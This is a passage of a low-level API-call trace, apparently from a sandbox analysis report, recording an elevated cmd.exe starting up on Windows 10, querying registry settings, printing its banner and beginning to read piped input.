phkResult=0x23aecfed58 | out: phkResult=0x23aecfed58*=0x7c) returned 0x0 [0184.796] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x23aecfed50, lpData=0x23aecfed70, lpcbData=0x23aecfed54*=0x1000 | out: lpType=0x23aecfed50*=0x0, lpData=0x23aecfed70*=0x4, lpcbData=0x23aecfed54*=0x1000) returned 0x2 [0184.796] RegQueryValueExW (in: hKey=0x7c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x23aecfed50, lpData=0x23aecfed70, lpcbData=0x23aecfed54*=0x1000 | out: lpType=0x23aecfed50*=0x4, lpData=0x23aecfed70*=0x1, lpcbData=0x23aecfed54*=0x4) returned 0x0 [0184.796] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x23aecfed50, lpData=0x23aecfed70, lpcbData=0x23aecfed54*=0x1000 | out: lpType=0x23aecfed50*=0x0, lpData=0x23aecfed70*=0x1, lpcbData=0x23aecfed54*=0x1000) returned 0x2 [0184.796] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x23aecfed50, lpData=0x23aecfed70, lpcbData=0x23aecfed54*=0x1000 | out: lpType=0x23aecfed50*=0x4, lpData=0x23aecfed70*=0x0, lpcbData=0x23aecfed54*=0x4) returned 0x0 [0184.796] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x23aecfed50, lpData=0x23aecfed70, lpcbData=0x23aecfed54*=0x1000 | out: lpType=0x23aecfed50*=0x4, lpData=0x23aecfed70*=0x40, lpcbData=0x23aecfed54*=0x4) returned 0x0 [0184.796] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x23aecfed50, lpData=0x23aecfed70, lpcbData=0x23aecfed54*=0x1000 | out: lpType=0x23aecfed50*=0x4, lpData=0x23aecfed70*=0x40, lpcbData=0x23aecfed54*=0x4) returned 0x0 [0184.796] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x23aecfed50, lpData=0x23aecfed70, lpcbData=0x23aecfed54*=0x1000 | out: lpType=0x23aecfed50*=0x0, lpData=0x23aecfed70*=0x40, lpcbData=0x23aecfed54*=0x1000) returned 0x2 [0184.796] RegCloseKey (hKey=0x7c) returned 0x0 [0184.796] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x23aecfed58 | out: phkResult=0x23aecfed58*=0x7c) returned 0x0 [0184.796] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x23aecfed50, lpData=0x23aecfed70, lpcbData=0x23aecfed54*=0x1000 | out: lpType=0x23aecfed50*=0x0, lpData=0x23aecfed70*=0x40, lpcbData=0x23aecfed54*=0x1000) returned 0x2 [0184.796] RegQueryValueExW (in: hKey=0x7c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x23aecfed50, lpData=0x23aecfed70, lpcbData=0x23aecfed54*=0x1000 | out: lpType=0x23aecfed50*=0x4, lpData=0x23aecfed70*=0x1, lpcbData=0x23aecfed54*=0x4) returned 0x0 [0184.796] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x23aecfed50, lpData=0x23aecfed70, lpcbData=0x23aecfed54*=0x1000 | out: lpType=0x23aecfed50*=0x0, lpData=0x23aecfed70*=0x1, lpcbData=0x23aecfed54*=0x1000) returned 0x2 [0184.796] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x23aecfed50, lpData=0x23aecfed70, lpcbData=0x23aecfed54*=0x1000 | out: lpType=0x23aecfed50*=0x4, lpData=0x23aecfed70*=0x0, lpcbData=0x23aecfed54*=0x4) returned 0x0 [0184.796] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x23aecfed50, lpData=0x23aecfed70, lpcbData=0x23aecfed54*=0x1000 | out: lpType=0x23aecfed50*=0x4, lpData=0x23aecfed70*=0x9, lpcbData=0x23aecfed54*=0x4) returned 0x0 [0184.796] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x23aecfed50, lpData=0x23aecfed70, lpcbData=0x23aecfed54*=0x1000 | out: lpType=0x23aecfed50*=0x4, lpData=0x23aecfed70*=0x9, lpcbData=0x23aecfed54*=0x4) returned 0x0 [0184.796] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x23aecfed50, lpData=0x23aecfed70, lpcbData=0x23aecfed54*=0x1000 | out: lpType=0x23aecfed50*=0x0, lpData=0x23aecfed70*=0x9, lpcbData=0x23aecfed54*=0x1000) returned 0x2 [0184.796] RegCloseKey (hKey=0x7c) returned 0x0 [0184.796] time (in: timer=0x0 | out: timer=0x0) returned 0x5ccf6ba6 [0184.796] srand (_Seed=0x5ccf6ba6) [0184.796] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0184.796] malloc (_Size=0x4000) returned 0x1ce535054f0 [0184.797] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0184.797] malloc (_Size=0xffce) returned 0x1ce537f0080 [0184.797] ??_V@YAXPEAX@Z () returned 0x1ce537f0080 [0184.797] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1ce537f0080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0184.797] malloc (_Size=0xffce) returned 0x1ce53800060 [0184.798] ??_V@YAXPEAX@Z () returned 0x1ce53800060 [0184.798] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ce53800060, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0184.798] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0184.798] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0184.798] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0184.798] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0184.798] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0184.798] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0184.798] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0184.798] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0184.798] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0184.798] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0184.798] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0184.798] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0184.799] GetProcessHeap () returned 0x1ce53620000 [0184.799] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce536264a0) returned 1 [0184.799] GetEnvironmentStringsW () returned 0x1ce53625a10* [0184.799] GetProcessHeap () returned 0x1ce53620000 [0184.799] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0xa94) returned 0x1ce53627a10 [0184.799] FreeEnvironmentStringsA (penv="A") returned 1 [0184.799] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0184.799] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0184.799] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0184.799] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0184.799] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0184.799] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0184.799] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0184.799] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0184.799] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0184.799] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0184.799] malloc (_Size=0xffce) returned 0x1ce53810040 [0184.799] ??_V@YAXPEAX@Z () returned 0x1ce53810040 [0184.799] GetProcessHeap () returned 0x1ce53620000 [0184.799] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x38) returned 0x1ce536284b0 [0184.799] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1ce53810040 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0184.800] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x7fe7, lpBuffer=0x1ce53810040, lpFilePart=0x23aecff8d0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x23aecff8d0*="system32") returned 0x13 [0184.800] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0184.800] FindFirstFileW (in: lpFileName="C:\\WINDOWS", lpFindFileData=0x23aecff600 | out: lpFindFileData=0x23aecff600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x1ce536284f0 [0184.800] FindClose (in: hFindFile=0x1ce536284f0 | out: hFindFile=0x1ce536284f0) returned 1 [0184.800] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x23aecff600 | out: lpFindFileData=0x23aecff600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xfabde9f3, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfabde9f3, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x1ce536284f0 [0184.800] FindClose (in: hFindFile=0x1ce536284f0 | out: hFindFile=0x1ce536284f0) returned 1 [0184.800] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0184.800] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0184.800] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0184.801] GetProcessHeap () returned 0x1ce53620000 [0184.801] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53627a10) returned 1 [0184.801] GetEnvironmentStringsW () returned 0x1ce536284f0* [0184.801] GetProcessHeap () returned 0x1ce53620000 [0184.801] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0xac4) returned 0x1ce53625a10 [0184.801] FreeEnvironmentStringsA (penv="=") returned 1 [0184.801] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1ce537f0080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0184.801] GetProcessHeap () returned 0x1ce53620000 [0184.801] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce536284b0) returned 1 [0184.801] ??_V@YAXPEAX@Z () returned 0x1 [0184.801] ??_V@YAXPEAX@Z () returned 0x1 [0184.801] GetProcessHeap () returned 0x1ce53620000 [0184.801] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x4016) returned 0x1ce53627a10 [0184.801] GetProcessHeap () returned 0x1ce53620000 [0184.801] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53627a10) returned 1 [0184.801] GetConsoleOutputCP () returned 0x1b5 [0185.402] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff69534fbb0 | out: lpCPInfo=0x7ff69534fbb0) returned 1 [0185.402] GetUserDefaultLCID () returned 0x409 [0185.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff69534bb78, cchData=8 | out: lpLCData=":") returned 2 [0185.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x23aecffc90, cchData=128 | out: lpLCData="0") returned 2 [0185.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x23aecffc90, cchData=128 | out: lpLCData="0") returned 2 [0185.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x23aecffc90, cchData=128 | out: lpLCData="1") returned 2 [0185.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff69534bb68, cchData=8 | out: lpLCData="/") returned 2 [0185.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff69534bb00, cchData=32 | out: lpLCData="Mon") returned 4 [0185.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff69534bac0, cchData=32 | out: lpLCData="Tue") returned 4 [0185.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff69534ba80, cchData=32 | out: lpLCData="Wed") returned 4 [0185.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff69534ba40, cchData=32 | out: lpLCData="Thu") returned 4 [0185.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff69534ba00, cchData=32 | out: lpLCData="Fri") returned 4 [0185.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff69534b9c0, cchData=32 | out: lpLCData="Sat") returned 4 [0185.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff69534b980, cchData=32 | out: lpLCData="Sun") returned 4 [0185.403] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff69534bb58, cchData=8 | out: lpLCData=".") returned 2 [0185.403] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff69534bb40, cchData=8 | out: lpLCData=",") returned 2 [0185.403] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0185.405] GetProcessHeap () returned 0x1ce53620000 [0185.405] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x0, Size=0x20c) returned 0x1ce53626550 [0185.405] GetConsoleTitleW (in: lpConsoleTitle=0x1ce53626550, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0185.634] _get_osfhandle (_FileHandle=1) returned 0x254 [0185.634] GetFileType (hFile=0x254) returned 0x3 [0185.634] ApiSetQueryApiSetPresence () returned 0x0 [0185.634] ResolveDelayLoadedAPI () returned 0x7ff8bf27d990 [0185.638] BrandingFormatString () returned 0x1ce53626c20 [0185.645] GetVersion () returned 0x3ad7000a [0185.645] _vsnwprintf (in: _Buffer=0x23aecffdf0, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x23aecffd88 | out: _Buffer="10.0.15063") returned 10 [0185.645] _get_osfhandle (_FileHandle=1) returned 0x254 [0185.645] GetFileType (hFile=0x254) returned 0x3 [0185.645] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff695357f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0185.646] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff695357f60, nSize=0x2000, Arguments=0x23aecffd90 | out: lpBuffer="Microsoft Windows [Version 10.0.15063]") returned 0x26 [0185.646] _get_osfhandle (_FileHandle=1) returned 0x254 [0185.646] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 10.0.15063]", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 10.0.15063]", lpUsedDefaultChar=0x0) returned 39 [0185.646] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x23aecffce8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x23aecffce8*=0x26, lpOverlapped=0x0) returned 1 [0185.646] _vsnwprintf (in: _Buffer=0x7ff695357f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x23aecffdb8 | out: _Buffer="\r\n") returned 2 [0185.646] _get_osfhandle (_FileHandle=1) returned 0x254 [0185.646] GetFileType (hFile=0x254) returned 0x3 [0185.646] _get_osfhandle (_FileHandle=1) returned 0x254 [0185.646] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0185.646] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x23aecffd88, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x23aecffd88*=0x2, lpOverlapped=0x0) returned 1 [0185.646] _vsnwprintf (in: _Buffer=0x7ff695357f60, _BufferCount=0x1fff, _Format="%s", _ArgList=0x23aecffdb8 | out: _Buffer="(c) 2017 Microsoft Corporation. All rights reserved.") returned 52 [0185.646] _get_osfhandle (_FileHandle=1) returned 0x254 [0185.646] GetFileType (hFile=0x254) returned 0x3 [0185.646] _get_osfhandle (_FileHandle=1) returned 0x254 [0185.646] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="(c) 2017 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="(c) 2017 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 53 [0185.646] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x23aecffd88, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x23aecffd88*=0x34, lpOverlapped=0x0) returned 1 [0185.646] _vsnwprintf (in: _Buffer=0x7ff695357f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x23aecffdb8 | out: _Buffer="\r\n") returned 2 [0185.646] _get_osfhandle (_FileHandle=1) returned 0x254 [0185.646] GetFileType (hFile=0x254) returned 0x3 [0185.646] _get_osfhandle (_FileHandle=1) returned 0x254 [0185.646] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0185.646] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x23aecffd88, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x23aecffd88*=0x2, lpOverlapped=0x0) returned 1 [0185.647] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff8c81c0000 [0185.647] GetProcAddress (hModule=0x7ff8c81c0000, lpProcName="CopyFileExW") returned 0x7ff8c81de830 [0185.647] GetProcAddress (hModule=0x7ff8c81c0000, lpProcName="IsDebuggerPresent") returned 0x7ff8c81de300 [0185.647] GetProcAddress (hModule=0x7ff8c81c0000, lpProcName="SetConsoleInputExeNameW") returned 0x7ff8c5880a40 [0185.647] ??_V@YAXPEAX@Z () returned 0x1 [0185.647] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.647] GetFileType (hFile=0x248) returned 0x3 [0185.647] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0185.647] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x23aecffbf8 | out: TokenHandle=0x23aecffbf8*=0x0) returned 0xc000007c [0185.647] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x23aecffbf8 | out: TokenHandle=0x23aecffbf8*=0x94) returned 0x0 [0185.647] NtQueryInformationToken (in: TokenHandle=0x94, TokenInformationClass=0x12, TokenInformation=0x23aecffba8, TokenInformationLength=0x4, ReturnLength=0x23aecffbb0 | out: TokenInformation=0x23aecffba8, ReturnLength=0x23aecffbb0) returned 0x0 [0185.647] NtQueryInformationToken (in: TokenHandle=0x94, TokenInformationClass=0x1a, TokenInformation=0x23aecffbb0, TokenInformationLength=0x4, ReturnLength=0x23aecffba8 | out: TokenInformation=0x23aecffbb0, ReturnLength=0x23aecffba8) returned 0x0 [0185.648] NtClose (Handle=0x94) returned 0x0 [0185.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x23aecffbc0, nSize=0x0, Arguments=0x23aecffbc8 | out: lpBuffer="渰卢ǎ") returned 0xf [0185.648] GetProcessHeap () returned 0x1ce53620000 [0185.648] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x218) returned 0x1ce53628bb0 [0185.648] GetConsoleTitleW (in: lpConsoleTitle=0x23aecffc10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0185.722] wcsstr (_Str="C:\\WINDOWS\\system32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0185.722] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 1 [0185.877] GetProcessHeap () returned 0x1ce53620000 [0185.877] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53628bb0) returned 1 [0185.877] LocalFree (hMem=0x1ce53626e30) returned 0x0 [0185.877] _vsnwprintf (in: _Buffer=0x7ff695357f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x23aecffa38 | out: _Buffer="\r\n") returned 2 [0185.877] _get_osfhandle (_FileHandle=1) returned 0x254 [0185.877] GetFileType (hFile=0x254) returned 0x3 [0185.877] _get_osfhandle (_FileHandle=1) returned 0x254 [0185.877] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0185.877] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x23aecffa08, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x23aecffa08*=0x2, lpOverlapped=0x0) returned 1 [0185.877] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0185.878] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1ce537f0080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0185.878] malloc (_Size=0x107ce) returned 0x1ce53800060 [0185.878] _vsnwprintf (in: _Buffer=0x1ce53800060, _BufferCount=0x83e5, _Format="%s", _ArgList=0x23aecffa48 | out: _Buffer="C:\\WINDOWS\\system32") returned 19 [0185.878] _vsnwprintf (in: _Buffer=0x1ce53800086, _BufferCount=0x83d2, _Format="%c", _ArgList=0x23aecffa48 | out: _Buffer=">") returned 1 [0185.878] _get_osfhandle (_FileHandle=1) returned 0x254 [0185.878] GetFileType (hFile=0x254) returned 0x3 [0185.878] _get_osfhandle (_FileHandle=1) returned 0x254 [0185.878] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\WINDOWS\\system32>", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\WINDOWS\\system32>", lpUsedDefaultChar=0x0) returned 21 [0185.878] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x23aecffa38, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x23aecffa38*=0x14, lpOverlapped=0x0) returned 1 [0185.878] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.878] GetFileType (hFile=0x248) returned 0x3 [0185.879] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.879] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.879] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.879] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c30, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0185.879] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.879] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.879] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.879] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c32, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0185.879] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.879] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.879] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.879] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c34, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0185.879] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.879] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.879] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0185.879] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c36, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0185.879] _get_osfhandle (_FileHandle=0) returned 0x248 [0185.879] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.879] ReadFile (in: hFile=0x248, 